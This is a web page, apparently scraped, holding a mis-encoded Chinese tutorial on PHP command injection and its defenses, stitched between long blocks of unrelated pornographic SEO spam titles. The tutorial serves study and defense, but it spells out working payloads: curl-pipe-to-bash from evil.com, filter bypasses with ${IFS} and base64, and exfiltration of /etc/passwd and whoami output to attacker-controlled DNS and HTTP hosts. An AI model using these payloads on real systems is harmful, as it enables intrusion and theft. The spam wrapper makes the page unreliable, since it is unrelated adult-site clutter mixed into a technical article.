久久亚洲成a人片熟女精品色一区二区三区|国产精品视频第一精品视频|av天堂热无码手机版|亚洲?v无码久久无遮挡|国产精品偷伦视频免费观看国产|麻豆国产自产精品丰满熟妇|av无码av不卡一区二区|久久亚洲精品中文字

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

PHP命令注入漏洞深度解析:從原理到防御的實(shí)戰(zhàn)指南

PHP命令注入漏洞深度解析:從原理到防御的實(shí)戰(zhàn)指南 1. 項目概述從一次線上故障說起那天晚上我正盯著監(jiān)控面板突然收到一連串告警。一個負(fù)責(zé)處理用戶上傳圖片、生成縮略圖的服務(wù)CPU使用率瞬間飆到100%緊接著服務(wù)器負(fù)載異常大量異常進(jìn)程被創(chuàng)建。登錄服務(wù)器一看好家伙/tmp目錄下塞滿了莫名其妙的文件ps aux里一堆wget和bash進(jìn)程在瘋狂運(yùn)行。根因很快定位到一個陳舊的圖片處理腳本里面有一行刺眼的代碼exec(convert $user_input_path output.jpg)。攻擊者通過上傳功能在文件名里嵌入了命令分隔符把簡單的圖片轉(zhuǎn)換變成了在服務(wù)器上為所欲為的“狂歡”。這就是命令注入一個看似古老卻依然活躍的Web安全漏洞而PHP的exec()、system()等函數(shù)往往是埋下這顆雷的“功臣”。命令注入Command Injection顧名思義就是攻擊者能夠?qū)阂庀到y(tǒng)命令“注入”到原本正常的應(yīng)用程序流程中并使之執(zhí)行。它不同于SQL注入操作數(shù)據(jù)庫命令注入直接威脅的是服務(wù)器操作系統(tǒng)本身危害等級通常是最高的RCE遠(yuǎn)程代碼執(zhí)行。PHP因其在Web開發(fā)中的歷史地位和靈活性大量遺留系統(tǒng)和簡單腳本中廣泛使用了exec()、system()、shell_exec()、passthru()以及反引號來調(diào)用系統(tǒng)命令完成諸如文件處理、系統(tǒng)監(jiān)控、調(diào)用外部工具等任務(wù)。這扇“方便之門”一旦對用戶輸入敞開就等于將服務(wù)器的Shell交給了攻擊者。本文將從一個資深開發(fā)和安全從業(yè)者的角度徹底拆解PHP中命令注入漏洞產(chǎn)生的原理、五花八門的攻擊手法并聚焦于真正可落地的防御方案。我不會只告訴你“要對輸入轉(zhuǎn)義”這種正確的廢話而是會深入PHP和Shell的交互層解釋為什么某些轉(zhuǎn)義會失效分享我在代碼審計和滲透測試中見過的真實(shí)繞過案例以及如何在架構(gòu)設(shè)計層面根本性地規(guī)避此類風(fēng)險。無論你是正在維護(hù)歷史代碼的PHP開發(fā)者還是對Web安全感興趣的學(xué)習(xí)者理解這個漏洞都至關(guān)重要。2. 漏洞原理深度剖析PHP如何與Shell“對話”要防御命令注入首先必須理解漏洞是如何產(chǎn)生的。這需要深入到PHP執(zhí)行系統(tǒng)命令的底層機(jī)制。2.1 exec()等函數(shù)的工作機(jī)制當(dāng)我們調(diào)用exec(“l(fā)s -la /home”)時PHP內(nèi)部發(fā)生了什么PHP進(jìn)程會通過fork()系統(tǒng)調(diào)用創(chuàng)建一個子進(jìn)程然后在這個子進(jìn)程中調(diào)用execve()系列系統(tǒng)調(diào)用啟動一個新的程序——通常是系統(tǒng)的默認(rèn)Shell如/bin/sh或/bin/bash。關(guān)鍵點(diǎn)在于PHP并不是直接執(zhí)行“l(fā)s”這個二進(jìn)制文件而是把整個字符串”ls -la /home”作為參數(shù)傳遞給Shell程序。然后由Shell來負(fù)責(zé)解析這條字符串識別出命令名ls、參數(shù)-la, /home再去PATH環(huán)境變量里找到ls命令的真實(shí)路徑并執(zhí)行。這就引入了最大的風(fēng)險點(diǎn)Shell的元字符Metacharacters。Shell為了完成復(fù)雜功能定義了一系列有特殊意義的字符例如命令分隔符;、、、||、|、\n換行管道和重定向|、、、變量和命令替換$、反引號 、$()通配符*、?、[]如果用戶輸入的數(shù)據(jù)未經(jīng)任何處理就直接拼接進(jìn)傳遞給Shell的字符串中那么輸入里的這些Shell元字符就會被Shell解析從而改變命令的原始意圖。2.2 一個經(jīng)典的漏洞代碼模式讓我們看一段極度危險但曾經(jīng)很常見的代碼?php $target_ip $_GET[‘ip‘]; // 用戶輸入 8.8.8.8; cat /etc/passwd system(“ping -c 4 “ . $target_ip); ?開發(fā)者本意是讓用戶輸入一個IP進(jìn)行ping測試。但當(dāng)攻擊者輸入8.8.8.8; cat /etc/passwd時拼接后的命令變?yōu)閜ing -c 4 8.8.8.8; cat /etc/passwdShell會將其解析為兩條順序執(zhí)行的命令先執(zhí)行ping -c 4 8.8.8.8然后執(zhí)行cat /etc/passwd。服務(wù)器上的敏感文件就這樣被泄露了。注意這里有一個非常重要的細(xì)節(jié)。很多人認(rèn)為用escapeshellarg()或escapeshellcmd()包裹整個命令就安全了這是錯誤的。這兩個函數(shù)用于轉(zhuǎn)義參數(shù)而不是整個命令字符串。如果將整個命令如system(escapeshellcmd(“ping -c 4 “ . $target_ip))對于輸入8.8.8.8; cat /etc/passwd它可能會轉(zhuǎn)義分號但更復(fù)雜的繞過仍然可能存在。安全的做法是僅將用戶輸入作為參數(shù)的一部分并對這個輸入?yún)?shù)進(jìn)行轉(zhuǎn)義。2.3 不僅僅是exec()危險函數(shù)家族exec()是最常見的但PHP中能執(zhí)行系統(tǒng)命令的函數(shù)是一個家族exec(string $command, array $output null, int $return_var null): string|false 執(zhí)行命令可以獲取最后一行輸出和返回值。通常用于不需要直接輸出而是需要處理結(jié)果的情況。system(string $command, int $return_var null): string|false 執(zhí)行命令并直接輸出結(jié)果。更“直給”常用于執(zhí)行簡單的命令。shell_exec(string $command): string|false 執(zhí)行命令并以字符串形式返回全部輸出。反引號是它的語法糖$output ls -la;等價于$output shell_exec(‘ls -la‘);。passthru(string $command, int $return_var null): void 執(zhí)行命令并直接輸出原始二進(jìn)制數(shù)據(jù)如圖像、文件流不進(jìn)行任何緩沖。常用于處理像tar、cat二進(jìn)制文件這樣的命令。popen(string $command, string $mode): resource|false和proc_open() 它們提供了更底層的進(jìn)程控制接口可以打開一個指向進(jìn)程的管道進(jìn)行雙向讀寫。功能強(qiáng)大但若使用不當(dāng)風(fēng)險同樣巨大。這些函數(shù)本質(zhì)上都面臨相同的命令注入風(fēng)險因為它們最終都是通過Shell來解釋命令字符串的。區(qū)別只在于輸出和處理方式漏洞的根源是一致的。3. 攻擊手法實(shí)戰(zhàn)演示攻擊者的“奇技淫巧”理解了原理我們來看看攻擊者在實(shí)際中會如何利用。假設(shè)有一處存在漏洞的代碼system(“nslookup “ . $_GET[‘hostname‘]);。3.1 基礎(chǔ)注入分隔符的妙用這是最直接的方式利用Shell的命令分隔符注入新的命令。分號;example.com; whoami命令變?yōu)閚slookup example.com; whoami。順序執(zhí)行。與example.com cat /etc/passwd命令變?yōu)閚slookup example.com cat /etc/passwd。只有前一條命令成功返回值為0才執(zhí)行后面的。或||example.com || curl evil.com/shell.sh | bash命令變?yōu)閚slookup example.com || curl ...。只有前一條命令失敗才執(zhí)行后面的。攻擊者可能故意輸入一個錯誤的主機(jī)名來觸發(fā)。后臺example.com sleep 10 命令變?yōu)閚slookup example.com sleep 10 。將所有命令放入后臺執(zhí)行可能用于延緩檢測或執(zhí)行耗時任務(wù)。管道|example.com | cat /etc/passwd命令變?yōu)閚slookup example.com | cat /etc/passwd。將前一個命令的輸出作為后一個命令的輸入。這里cat會忽略管道輸入直接輸出文件內(nèi)容。3.2 進(jìn)階繞過當(dāng)輸入被“過濾”時在實(shí)際攻擊中開發(fā)者可能會進(jìn)行一些簡單的過濾比如黑名單過濾;、等字符。這時攻擊者會嘗試?yán)@過。空格繞過很多過濾腳本會檢測空格但Shell中表示空格的方式不止一種。${IFS} IFS是Shell的內(nèi)部字段分隔符默認(rèn)包含空格。cat${IFS}/etc/passwd?;蛑囟ㄏ蚍鹀at/etc/passwd。后面接文件名本身可以替代空格。Tab鍵%09(URL編碼) 在某些上下文中Tab也能作為分隔符。黑名單關(guān)鍵字繞過 如果過濾了cat、ls等命令。使用變量拼接ac;bat;$a$b /etc/passwd。使用通配符/bin/c?t /etc/passwdl*。使用其他命令more、less、head、tail、nl、od等都可以用來讀取文件。使用編碼echo ‘Y2F0IC9ldGMvcGFzc3dk‘ | base64 -d | bashY2F0IC9ldGMvcGFzc3dk是cat /etc/passwd的base64編碼。命令替換與子Shell反引號echo cat /etc/passwd實(shí)際會先執(zhí)行echo cat輸出cat再執(zhí)行cat /etc/passwd這里只是示例原理。$(command) 原理同上更現(xiàn)代的形式。ls $(echo -la)。利用環(huán)境變量和通配符cat $x /etc/passwd如果$x未定義或為空就相當(dāng)于cat /etc/passwd。/???/??t /???/p??s??d這種通配符形式在特定條件下也可能繞過簡單的字符串匹配。3.3 無回顯Blind命令注入與帶外OOB數(shù)據(jù)利用很多時候命令執(zhí)行了但頁面沒有輸出例如exec()只獲取最后一行。攻擊者如何知道命令是否成功并獲取結(jié)果呢時間延遲Time-based Blind 通過注入sleep命令來判斷。example.com sleep 5 如果頁面響應(yīng)延遲了5秒說明注入成功。這可以用于構(gòu)造布爾條件例如example.com test -f /etc/passwd sleep 5如果文件存在就sleep。DNS帶外查詢DNS OOB 這是非常隱蔽有效的一種方式。example.com nslookup $(whoami).attacker-evildomain.com攻擊者控制attacker-evildomain.com的DNS服務(wù)器當(dāng)目標(biāo)服務(wù)器執(zhí)行命令時會嘗試解析當(dāng)前用戶名.attacker-evildomain.com這個域名。攻擊者查看DNS查詢?nèi)罩揪湍芸吹絯hoami命令的輸出結(jié)果被作為子域名帶出來了。HTTP帶外請求HTTP OOB 利用curl或wget將數(shù)據(jù)發(fā)送到攻擊者控制的服務(wù)器。example.com curl http://evil-server/$(cat /etc/passwd | base64)攻擊者在evil-server的Web日志中就能看到被Base64編碼的/etc/passwd文件內(nèi)容。為了避免特殊字符問題通常會對輸出進(jìn)行編碼。實(shí)操心得在滲透測試中遇到疑似盲注點(diǎn)時我首先會嘗試ping -c 1或sleep測試連通性然后立刻嘗試DNS OOB。因為很多服務(wù)器的出站流量限制防火墻可能允許DNS53端口但禁止任意HTTP而DNS請求的隱蔽性也更高。工具如Burp Suite Collaborator或dnslog.cn這類平臺可以自動化地接收和展示這類帶外數(shù)據(jù)極大提高了測試效率。4. 防御策略全景從輸入到架構(gòu)的多層防線防御命令注入絕不能只依賴某一層。我們需要一個縱深防御體系。4.1 第一道防線輸入驗證與白名單這是最根本也最有效的方法。核心思想是定義什么是合法的拒絕一切不符合規(guī)則的數(shù)據(jù)。白名單 vs 黑名單 永遠(yuǎn)優(yōu)先使用白名單。黑名單過濾危險字符注定會失敗因為繞過方式層出不窮。白名單則只允許已知安全的字符通過。如何實(shí)施對于“IP地址”參數(shù)使用正則表達(dá)式嚴(yán)格匹配IPv4/IPv6格式/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/或filter_var($ip, FILTER_VALIDATE_IP)。對于“主機(jī)名”參數(shù)檢查是否只包含字母、數(shù)字、點(diǎn)、連字符/^[a-zA-Z0-9.-]$/。對于“文件名”參數(shù)限制字符集并禁止路徑穿越符..、/、\。使用PHP的filter_var()函數(shù)或ctype_*系列函數(shù)進(jìn)行輔助驗證。$user_ip $_GET[‘ip‘]; if (!filter_var($user_ip, FILTER_VALIDATE_IP)) { die(‘Invalid IP address format.‘); } // 此時$user_ip 在格式上是安全的可以用于拼接 system(“ping -c 4 “ . escapeshellarg($user_ip));4.2 第二道防線安全的命令執(zhí)行與參數(shù)轉(zhuǎn)義當(dāng)必須使用系統(tǒng)命令時必須確保用戶輸入只作為數(shù)據(jù)參數(shù)而不是命令的一部分。使用escapeshellarg()函數(shù)這是最推薦、最安全的方式。它的作用是將一個字符串轉(zhuǎn)義成一個單一的、安全的Shell參數(shù)。它會給字符串加上單引號‘并將字符串中已有的單引號轉(zhuǎn)義為‘\‘‘。$user_input $_GET[‘filename‘]; // 假設(shè)輸入是 file‘; rm -rf / # $safe_argument escapeshellarg($user_input); // 輸出: ‘file‘\‘‘; rm -rf / #‘ system(“cat “ . $safe_argument); // 命令變?yōu)? cat ‘file‘\‘‘; rm -rf / #‘Shell會認(rèn)為$safe_argument是一個完整的參數(shù)值其中的分號、空格、#號都失去了特殊含義。攻擊者注入的命令被安全地“包裹”在一個字符串參數(shù)里。使用escapeshellcmd()函數(shù) 這個函數(shù)會轉(zhuǎn)義Shell元字符#;|*?~^()[]{}$使其失去特殊含義。但要注意它不處理參數(shù)邊界。通常用于轉(zhuǎn)義命令路徑而不是用戶輸入。對于用戶輸入escapeshellarg()是更安全的選擇。// 不安全的用法示例 $cmd “l(fā)s -la “ . escapeshellcmd($_GET[‘dir‘]); // 輸入 .; pwd escapeshellcmd會轉(zhuǎn)義分號變成 ls -la .\; pwd // 這仍然是危險的因為ls會嘗試列出.\和pwd兩個文件/目錄雖然不會執(zhí)行pwd命令但可能引發(fā)其他意外行為或信息泄露。最佳實(shí)踐模式使用數(shù)組參數(shù)形式調(diào)用exec()等函數(shù)PHP 5.3 抱歉這是一個常見的誤解。PHP的exec()、system()等函數(shù)本身不支持像proc_open()或popen()那樣的數(shù)組參數(shù)形式來避免Shell調(diào)用。它們總是通過Shell執(zhí)行的。要避免Shell必須使用proc_open()并設(shè)置bypass_shell選項或者使用pcntl_exec()僅限CLI模式。因此安全拼接的唯一推薦模式是exec(‘固定命令 ‘ . escapeshellarg($user_input1) . ‘ 固定參數(shù) ‘ . escapeshellarg($user_input2))。4.3 第三道防線最小權(quán)限原則與環(huán)境硬化即使代碼有漏洞我們也應(yīng)該限制漏洞被利用后造成的破壞。運(yùn)行在低權(quán)限用戶下 PHP-FPM或Apache的PHP模塊絕不要以root用戶運(yùn)行。應(yīng)該創(chuàng)建一個專用的、低權(quán)限的用戶如www-data、nginx來運(yùn)行Web服務(wù)。這樣即使被注入命令攻擊者也無法直接讀寫關(guān)鍵系統(tǒng)文件、安裝軟件等。配置open_basedir 在php.ini中設(shè)置open_basedir將PHP可訪問的文件限制在網(wǎng)站目錄內(nèi)。這可以防止攻擊者使用cat、file_get_contents()等讀取系統(tǒng)敏感文件如/etc/passwd,/proc/self/environ。禁用危險函數(shù) 在php.ini中通過disable_functions指令直接禁用不必要的命令執(zhí)行函數(shù)。disable_functions exec,system,passthru,shell_exec,popen,proc_open,pcntl_exec,curl_exec,curl_multi_exec,parse_ini_file,show_source,dl,symlink,...注意這可能會影響某些合法功能需要根據(jù)實(shí)際業(yè)務(wù)評估。對于新項目應(yīng)從一開始就避免使用這些函數(shù)。使用safe_mode的替代方案 PHP的safe_mode已被廢棄且效果有限?,F(xiàn)代PHP環(huán)境下應(yīng)通過上述的權(quán)限控制、容器化等方式實(shí)現(xiàn)隔離。4.4 第四道防線架構(gòu)優(yōu)化與替代方案最好的防御是不給攻擊者留下攻擊面。重新思考是否真的需要執(zhí)行系統(tǒng)命令使用PHP原生函數(shù)替代文件操作用scandir()替代lsfile_get_contents()/file_put_contents()替代cat/echocopy()/unlink()替代cp/rm。進(jìn)程信息用getrusage()、sys_getloadavg()替代調(diào)用top、uptime。網(wǎng)絡(luò)操作用gethostbyname()替代nslookup用fsockopen()或curl擴(kuò)展替代wget/telnet。使用經(jīng)過嚴(yán)格審查的第三方庫 例如處理圖片用Intervention Image或Imagine庫而不是調(diào)用外部的ImageMagick命令行。處理壓縮文件用ZipArchive類而不是unzip命令。這些庫通常經(jīng)過了更好的安全審計和輸入處理。將危險操作隊列化與沙盒化隊列化 如果必須執(zhí)行耗時或高風(fēng)險的外部命令如視頻轉(zhuǎn)碼不要在前端Web請求中直接執(zhí)行。應(yīng)該將任務(wù)放入消息隊列如Redis、RabbitMQ由后臺獨(dú)立的、權(quán)限受控的工作進(jìn)程Worker來消費(fèi)和執(zhí)行。這樣可以將執(zhí)行環(huán)境與Web服務(wù)隔離。沙盒化/容器化 對于極度不信任或復(fù)雜的操作可以考慮在Docker容器內(nèi)執(zhí)行。Web應(yīng)用通過API或隊列將任務(wù)和有限的輸入數(shù)據(jù)傳遞給一個一次性任務(wù)容器容器執(zhí)行完畢后即銷毀。這提供了最強(qiáng)的隔離性。5. 實(shí)戰(zhàn)代碼審計與修復(fù)案例讓我們看一個從真實(shí)老舊系統(tǒng)中摘錄的、需要修復(fù)的代碼片段。漏洞代碼示例一個簡單的服務(wù)器監(jiān)控面板// file: admin/stats.php $server $_GET[‘server‘]; // 用戶輸入服務(wù)器IP或主機(jī)名 $metric $_GET[‘metric‘]; // 用戶選擇監(jiān)控項如 ‘cpu‘, ‘disk‘ $command ““; switch ($metric) { case ‘cpu‘: $command “ssh admin$server ‘top -bn1 | grep \Cpu(s)\‘“; break; case ‘disk‘: $command “ssh admin$server ‘df -h‘“; break; default: die(‘Invalid metric.‘); } $output shell_exec($command); echo “pre“ . htmlspecialchars($output) . “/pre“;漏洞分析直接拼接用戶輸入$server 攻擊者可以控制$server變量注入SSH命令。例如server127.0.0.1; whoami;或server127.0.0.1‘ cat /etc/passwd #。使用了shell_exec() 命令通過Shell執(zhí)行所有元字符都會生效。雖然對$metric用了白名單switch-case但對$server毫無防護(hù)。修復(fù)方案修復(fù)的核心思路是1) 對$server進(jìn)行嚴(yán)格的白名單驗證2) 安全地構(gòu)建SSH命令。// file: admin/stats.php (修復(fù)后) $server $_GET[‘server‘]; $metric $_GET[‘metric‘]; // 1. 輸入驗證白名單 $allowed_servers [‘web01.internal.com‘, ‘db01.internal.com‘, ‘192.168.1.10‘]; if (!in_array($server, $allowed_servers)) { die(‘Access denied: Invalid server specified.‘); } $allowed_metrics [‘cpu‘, ‘disk‘]; if (!in_array($metric, $allowed_metrics)) { die(‘Invalid metric.‘); } // 2. 使用SSH密鑰認(rèn)證避免在命令中暴露密碼。這里假設(shè)已配置免密登錄。 // 3. 安全構(gòu)建命令將用戶輸入$server作為ssh命令的參數(shù)并使用escapeshellarg確保其安全。 $ssh_target escapeshellarg($server); $remote_command ““; switch ($metric) { case ‘cpu‘: $remote_command “‘top -bn1 | grep \\“Cpu(s)\\‘“; // 注意遠(yuǎn)程命令內(nèi)的引號轉(zhuǎn)義 break; case ‘disk‘: $remote_command “‘df -h‘“; break; } // 4. 拼接完整命令。$ssh_target 已被escapeshellarg處理是安全的。 $local_command “ssh -o ConnectTimeout5 -o BatchModeyes admin{$ssh_target} {$remote_command}“; // 5. 可選設(shè)置超時和輸出限制 $output shell_exec(“timeout 10s “ . $local_command . “ 21“); if ($output null) { echo “Failed to execute command or command timed out.“; } else { echo “pre“ . htmlspecialchars($output) . “/pre“; }修復(fù)要點(diǎn)解析$allowed_servers白名單 這是最堅固的防線直接限定只能操作預(yù)設(shè)的幾臺服務(wù)器。escapeshellarg($server) 即使白名單被意外繞過或未來動態(tài)添加服務(wù)器這也確保了$server值在本地Shell上下文中被當(dāng)作一個整體參數(shù)防止注入到ssh命令本身。SSH選項-o BatchModeyes強(qiáng)制使用密鑰認(rèn)證避免密碼提示。-o ConnectTimeout5防止因網(wǎng)絡(luò)問題導(dǎo)致進(jìn)程掛起。遠(yuǎn)程命令硬編碼$remote_command是開發(fā)者完全控制的字符串沒有用戶輸入。其中的引號需要小心轉(zhuǎn)義以確保它能在遠(yuǎn)程Shell中被正確解析。本地命令超時 使用timeout 10s包裝整個命令防止惡意命令如sleep 1000長期占用資源。錯誤處理21將標(biāo)準(zhǔn)錯誤重定向到標(biāo)準(zhǔn)輸出便于捕獲錯誤信息。檢查shell_exec的返回值是否為null通常表示執(zhí)行失敗或命令不存在。6. 高級話題與常見誤區(qū)6.1 proc_open() 與 pcntl_exec() 的安全性proc_open() 這個函數(shù)提供了最精細(xì)的進(jìn)程控制。它的一個關(guān)鍵安全優(yōu)勢是可以繞過Shell。通過將$descriptorspec參數(shù)配置好并使用$pipes進(jìn)行通信你可以將命令和參數(shù)以數(shù)組形式傳遞從而避免字符串被Shell解析。$cmd ‘/usr/bin/convert‘; $args [‘input.jpg‘, ‘-resize‘, ‘50%‘, ‘output.jpg‘]; // 用戶輸入需經(jīng)過escapeshellarg處理后再放入數(shù)組 $proc proc_open(array_merge([$cmd], $args), $descriptorspec, $pipes);但是請注意即使使用數(shù)組如果$cmd本身來自用戶輸入比如允許用戶選擇/bin/bash或/usr/bin/python風(fēng)險依然存在。數(shù)組形式只能防止參數(shù)注入不能防止命令替換。$cmd本身必須來自可信源白名單。pcntl_exec() 這個函數(shù)在當(dāng)前進(jìn)程空間內(nèi)直接執(zhí)行指定程序完全不經(jīng)過Shell。這是最安全的方式之一但它有兩個主要限制1) 僅能在CLI命令行模式下使用2) 執(zhí)行后當(dāng)前PHP進(jìn)程會結(jié)束難以獲取輸出。因此它不適合Web場景。6.2 關(guān)于 escapeshellarg 和 escapeshellcmd 的經(jīng)典誤區(qū)網(wǎng)上很多文章會說“用escapeshellcmd()過濾整個命令用escapeshellarg()過濾參數(shù)”。這個說法不準(zhǔn)確且危險。escapeshellcmd($whole_command) 它只會轉(zhuǎn)義命令字符串中出現(xiàn)的Shell元字符。如果用戶輸入是命令的一部分如ping 127.0.0.1; ls轉(zhuǎn)義分號后變成ping 127.0.0.1\; ls這仍然是一個一個命令ping帶著兩個參數(shù)127.0.0.1;和ls。ping命令會嘗試連接主機(jī)名為127.0.0.1;的機(jī)器這通常會導(dǎo)致錯誤雖然不會執(zhí)行l(wèi)s但已經(jīng)改變了命令的語義可能引發(fā)其他問題如錯誤信息泄露、參數(shù)注入到ping命令本身。它不能安全地將用戶輸入隔離為一個參數(shù)。正確的做法永遠(yuǎn)將用戶輸入視為數(shù)據(jù)并使用escapeshellarg()將其轉(zhuǎn)化為一個安全的、被引號包裹的參數(shù)然后再拼接到固定的命令框架中。即safe_command ‘固定命令 ‘ . escapeshellarg($user_input)。6.3 現(xiàn)代PHP框架與依賴包的風(fēng)險即使你使用了Laravel、Symfony等現(xiàn)代框架風(fēng)險依然存在??蚣鼙旧硗ǔ2粫苯右朊钭⑷氲_發(fā)者可能錯誤地使用它們。Artisan 命令 Laravel的Artisan命令可以通過Artisan::call()或\Illuminate\Support\Facades\Artisan調(diào)用。如果用戶輸入直接傳遞給了Artisan命令的參數(shù)而該Artisan命令內(nèi)部又調(diào)用了exec()風(fēng)險鏈就形成了。需要審計自定義Artisan命令的代碼。第三方包Composer 很多包為了便捷會封裝系統(tǒng)命令。例如某些圖片處理包、PDF生成包、備份包等。在引入這些包時需要閱讀其源碼或文檔確認(rèn)其執(zhí)行命令時是否安全地處理了輸入。不要盲目相信“流行就等于安全”。序列化與反序列化漏洞 雖然不直接是命令注入但PHP反序列化漏洞可能導(dǎo)致任意代碼執(zhí)行其結(jié)果與命令注入等同。確保不對不可信的數(shù)據(jù)進(jìn)行unserialize()操作。7. 自動化檢測與滲透測試技巧作為開發(fā)者除了編寫安全代碼也需要具備基礎(chǔ)的漏洞檢測能力。7.1 代碼審計中的快速定位全局搜索危險函數(shù) 在項目目錄下使用grep或IDE的全局搜索查找以下關(guān)鍵詞grep -r “exec\|system\|passthru\|shell_exec\|popen\|proc_open\|pcntl_exec\|“ . --include“*.php“分析用戶輸入流 對于找到的每個危險函數(shù)調(diào)用向上追溯其參數(shù)來源。是否來自$_GET、$_POST、$_REQUEST、$_COOKIE、$_SERVER某些HTTP頭可能不可信是否經(jīng)過了安全的處理檢查過濾邏輯 如果發(fā)現(xiàn)了過濾函數(shù)如str_replace過濾分號思考是否能繞過如使用${IFS}、換行符、編碼等。7.2 簡單的滲透測試驗證在獲得合法授權(quán)的前提下可以對疑似點(diǎn)進(jìn)行測試?;A(chǔ)測試Payload; whoami| whoami whoami|| whoami$(whoami)whoami盲注測試Payload; sleep 5 ping -c 5 127.0.0.1 注意觀察響應(yīng)時間或服務(wù)器負(fù)載 curl http://your-collaborator-domain使用Burp Collaborator或RequestBin nslookup $(whoami).your-collaborator-domain工具輔助Burp Suite 使用Intruder模塊配合包含各種命令分隔符和繞過技巧的Payload字典進(jìn)行Fuzz測試。Commix 一個自動化的命令注入檢測和利用工具可以集成到Burp Suite中。OWASP ZAP 包含基礎(chǔ)的命令注入掃描規(guī)則。注意事項未經(jīng)授權(quán)的滲透測試是非法的。所有安全測試必須在目標(biāo)系統(tǒng)所有者明確授權(quán)、并在隔離的測試環(huán)境中進(jìn)行。在生產(chǎn)環(huán)境進(jìn)行未經(jīng)授權(quán)的測試等同于攻擊行為將承擔(dān)法律責(zé)任。命令注入漏洞的根源在于“信任了不可信的數(shù)據(jù)”。防御它需要開發(fā)者建立起牢固的安全意識所有來自外部的輸入都是惡意的直到被證明是安全的。通過白名單輸入驗證、安全的參數(shù)轉(zhuǎn)義、最小權(quán)限運(yùn)行和架構(gòu)層面的隔離我們可以將這個高危漏洞的風(fēng)險降到最低。在PHP的世界里escapeshellarg()是你最忠實(shí)的朋友而shell_exec()和反引號則是需要被時刻警惕的“危險伙伴”。記住安全不是一個功能而是一個貫穿設(shè)計、開發(fā)、測試、部署全流程的基礎(chǔ)屬性。每一次調(diào)用系統(tǒng)命令前都請多問自己一句“這里的用戶輸入我真的處理好了嗎”
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
亚洲欧美91| 不卡在线观看视频| 日韩福利综合一区| www.夜夜| 日本精品性生活久久久| 青青草福利视频| 特色a在线上| 97神马久久| 久久精品国产亚洲AV高清演员表| 99热综合| 久久东京热成人| а√天堂资源官网在线资源| 日韩AV一区二区三区四四| 久久久久国产| 人人看人人插| 欧美色997| 黄页av| 午夜电影在线观看无码专区| 亚洲性感丝袜诱惑在线观看| 天天干天天舔| 伊人久久国产免费观看视频| 免费家庭乱伦视频| 嗯阿好爽好紧| 欲香欲色| 99色色网| 久久超碰com| 国内精品久久久久影院亚洲| 日韩欧美麻豆 | 国产亚洲99久久精品| 欧美天天谢综合网| 97欧美性爱| 精品久久大胆人体| 亚洲最大无码中文字幕网站| 东北操逼| 国内精品久久久久影院亚洲| 99在线精品观看视频中文| 翔田千里一区二区三区奶水| 欧美日韩国产人人| a天堂视频| 亚洲高潮少妇| 大香蕉综合网| 超碰久久中文| 免费精品中文字幕| 日日AAvv| 亚洲有码 欧美精品| 欧色网址| 色91综合网| 三级特黄60分钟播放| 97碰碰日本乱偷人妻中文的| 操逼操操操91| 成人热久久精品| 91色s| 国产精品自产拍在线观看社区| 亚洲精品黑丝| 蜜臀久久99精品久久久久免费观| 日本性爰一道本| 亚洲天堂日本| www.夜夜| 蜜乳性色无码专日粉嫩骚逼AV| 韩国轻伦国内自拍一区| 亚洲欧洲综合成人av一区| 久久只有精品一区二区三区| 欧美人妻久久精品二区三区| 69一区二区三区| 伊人大香蕉在线| 成人精品在线免费视频| 熟妇高潮一区二| 18禁的网站在线| 久久婷婷一区| 天天香香欲综合| 亚洲天天做日日做天天谢日日 | 韩日性爱av| 超碰综合97在线| 免费看毛片操穴| 日韩一级性爱无码| 蜜桃臀久久| 婷婷色播婷婷| 国产一区在线观看无码AV| 久久精品国产99久久,亚洲日韩久久日本一区一区三区 | 啊啊啊想要| 高潮综合网| 97精品综合久久| AAAA级日本片免费视频| 国产视频第二页| 日本999精品| 99久久久久| 日本伦乱九九九综合| 麻豆区久久久久亚| 熟女一区二区三区| 亚洲麻豆精品二区三区| 国产av美女被艹的乱叫| 情趣丝袜无码操逼视频| a级理论午夜日本| 97综合在线| 91精品少妇搡搡搡| 天天草AV| 色老汉色| 97人人干人人操| 色视频蜜乳| 91美女片在线| AV色五月天| 艳美熟妇先锋一二三区| 可以看的av| 18禁美女裸体无遮挡啪啪| 人爽不卡视频| 婷婷人妻激情| 欧美第二页午夜| 91久久精品国产| 乱老女人一区二区视频| 欧美性爱中文字幕无线码| 韩国三级一线观看久| 久久日韩肥臀| 97国产精品在线观看| 青青草乱入乱欲视频在线观看| 大香蕉宗合网在线| 蜜色网色哟哟| 自拍丝袜美腿人妻| 欧美午夜色妇色鬼| 久久精品视频在线观看| 欧美18禁91| 91久久婷婷| 亚洲无码AV九九九| 99视频内射三四| 操逼操逼逼操操逼91| 精品久久久久久中文字幕三区| 精品成人久久久人人亚洲| 日韩人妻精品| 热G综合热G中文| 天美传媒av一区二区| 少妇三P| 国产大片精久久久久久| 啊啊啊啊啊啊啊在线| 日韩精品第3页| 日日噜噜夜夜久久亚洲一区二区| 东方亚洲在线操逼天堂| 欧美黑人与女人91| 91n欧美| 青青草福利视频| 撸无码不卡免费视频| 日韩欧美久久婷婷网站| 麻豆91熟妇人妻中文字幕茄子| 精品视频一区二区| 青青久久艹| 性91| 伊人黄色片| 国产精品分类在线观看| 懂色av色欲av蜜臀av| 91视频观看网站| oumeisetu综合| 99色悠悠| 久久一二三四五六七八九区区| 久操在97| AV女资源| 欧美色涩| 另类小说综合网| 国产精品熟女丝袜一区二区| 亚洲av在线免费观看| 按摩中文字幕| 久久久免费视频18| 亚洲另类春色| 日本午夜操逼| 人人妻人人操人人乐| 无码一区二区三区四区五区六区七区八区九区十区视频 | 日本天天干天天操一区| 黄色免费网| 狠狠中文字幕| 亚洲熟女乱色| 色97干| 人人潮人人摸| 97亚洲综合电影| 大香蕉欧美国产日韩高潮| 久久久久久中文| 亚洲综合欧美| 色官网在线| 久超超碰| 中文字幕精品码亚洲| 国语对白露脸XXXXXX| 乱欲一区二区| 人妻少妇精品久久久| 国产一区二区在线看| 欧美色网| AAA久久| B049AV在线播放| 欧美东京热青青草| 粉嫩绯色AV一区二区在线| 女优免费一区二区永久| 国产91丝袜 在线播放| 自拍偷拍 高清无码| 五月综合视频| 区自美91| 一级毛片久久久久久久女人18| 天天弄天天操| 麻豆天天躁天天揉揉AV| 中文字幕一区二区在线日韩精品| 亚洲精品久| 亚洲综合另类色图| 凹凸视频在线观看伊人| 91成人国产综合久久精品蜜月| 超碰色美女| 日韩在线一区二区| 伊人991| 亚洲97综| 超碰99在线观看| 91精品操美女| 国产视频不卡在线观看| 伦理日韩国产久久| 国产树林里野战在线看| 